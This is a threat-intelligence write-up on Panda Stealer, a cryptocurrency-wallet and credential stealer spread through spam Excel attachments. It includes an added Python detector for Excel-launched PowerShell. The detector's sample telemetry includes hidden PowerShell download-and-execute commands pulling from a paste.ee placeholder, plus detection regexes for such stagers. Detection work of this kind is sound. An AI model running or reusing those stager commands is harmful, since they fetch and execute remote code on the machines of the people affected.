Panda Stealer: Spreading via Spam Emails and Discord

A new information stealer has been discovered that is being delivered via spam emails and targets cryptocurrency wallets. This threat is named Panda Stealer and was observed mostly targeting users in the U.S., Germany, Australia, and Japan. The stealer is a modified variant of the Collector Stealer.

What has happened?
According to Trend Micro researchers, the new stealer was discovered in April. The most recent wave of the spam campaign had the biggest impact on Australia, Germany, Japan, and the U.S.
The stealer is spreading via spam emails masquerading as business quote requests to fool victims into clicking on malicious Excel files. Two infection chains are spreading the stealer.
The first one has an ‘.XLSM’ attachment with malicious macros that download a loader. Next, the loader downloads and executes the main stealer.
The second involves an attached .XLS file whose Excel formula runs a PowerShell command that fetches, from the Pastebin alternative paste[.]ee, a second, encrypted PowerShell command.
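As an added example (not from the article or from Trend Micro's research), the following Python flags the second chain described above in process-creation telemetry: Excel spawning PowerShell whose command line reaches paste.ee or carries an encoded or download-and-execute stager. The field names mirror Sysmon Event ID 1 and the sample events are constructed; the paste.ee path in them is a placeholder.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

OFFICE_PARENTS = {"excel.exe"}                  # the lure document host in the chain above
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}   # PowerShell launched by the XLS formula

# Command-line indicators of the stager (the article defangs the domain as paste[.]ee)
INDICATORS = {
    "paste_ee": re.compile(r"paste\.ee", re.I),
    "encoded_command": re.compile(r"(?:^|\s)-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_and_run": re.compile(r"DownloadString|Invoke-WebRequest|\biwr\b|\biex\b|Invoke-Expression", re.I),
}

@dataclass
class ProcEvent:
    parent_image: str    # assumed field names modelled on Sysmon ID 1 (ParentImage / Image / CommandLine)
    image: str
    command_line: str

def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev: ProcEvent) -> list[str]:
    """Return the reasons an event matches the Excel -> PowerShell -> paste.ee chain; [] means not flagged."""
    if _basename(ev.image) not in SCRIPT_HOSTS:
        return []
    reasons = ["office_spawned_powershell"] if _basename(ev.parent_image) in OFFICE_PARENTS else []
    reasons += [name for rx_name, rx in INDICATORS.items() if rx.search(ev.command_line) for name in [rx_name]]
    # Office as parent is enough on its own; otherwise require two stager indicators to cut admin noise
    if "office_spawned_powershell" in reasons or len(reasons) >= 2:
        return reasons
    return []

def scan(events: list[ProcEvent]) -> list[tuple[int, list[str]]]:
    """Index and reasons for every flagged event, in input order."""
    return [(i, r) for i, ev in enumerate(events) if (r := classify(ev))]

# Constructed sample telemetry (not real captures)
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
XL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
SAMPLE_EVENTS = [
    ProcEvent(XL, PS, "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcEvent(r"C:\Windows\explorer.exe", PS, "powershell.exe Get-Process"),
    ProcEvent(XL, PS, "powershell -NoP -W Hidden -c \"IEX (New-Object Net.WebClient).DownloadString('https://paste.ee/r/PLACEHOLDER')\""),
    ProcEvent(r"C:\Windows\System32\cmd.exe", PS, "powershell -c \"iex ((New-Object Net.WebClient).DownloadString('https://paste.ee/r/PLACEHOLDER'))\""),
]

if __name__ == "__main__":
    for idx, why in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(why)}")
```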

Additional insights
Researchers found 264 files similar to Panda Stealer on VirusTotal and some of them were being shared on Discord.
In addition, the stealer uses the fileless distribution method of the Fair variant of the Phobos ransomware to avoid detection.

Post-infection activities
Once Panda Stealer is successfully deployed, it tries to steal information such as past transactions from cryptocurrency wallets, including Bytecoin, Dash, Ethereum, and Litecoin, along with private keys.
Moreover, it can steal credentials from applications, such as NordVPN, Telegram, Steam, and Discord.
It can take screenshots of the infected system and swipe cookies and passwords from browsers.

Similarities with Collector Stea ..
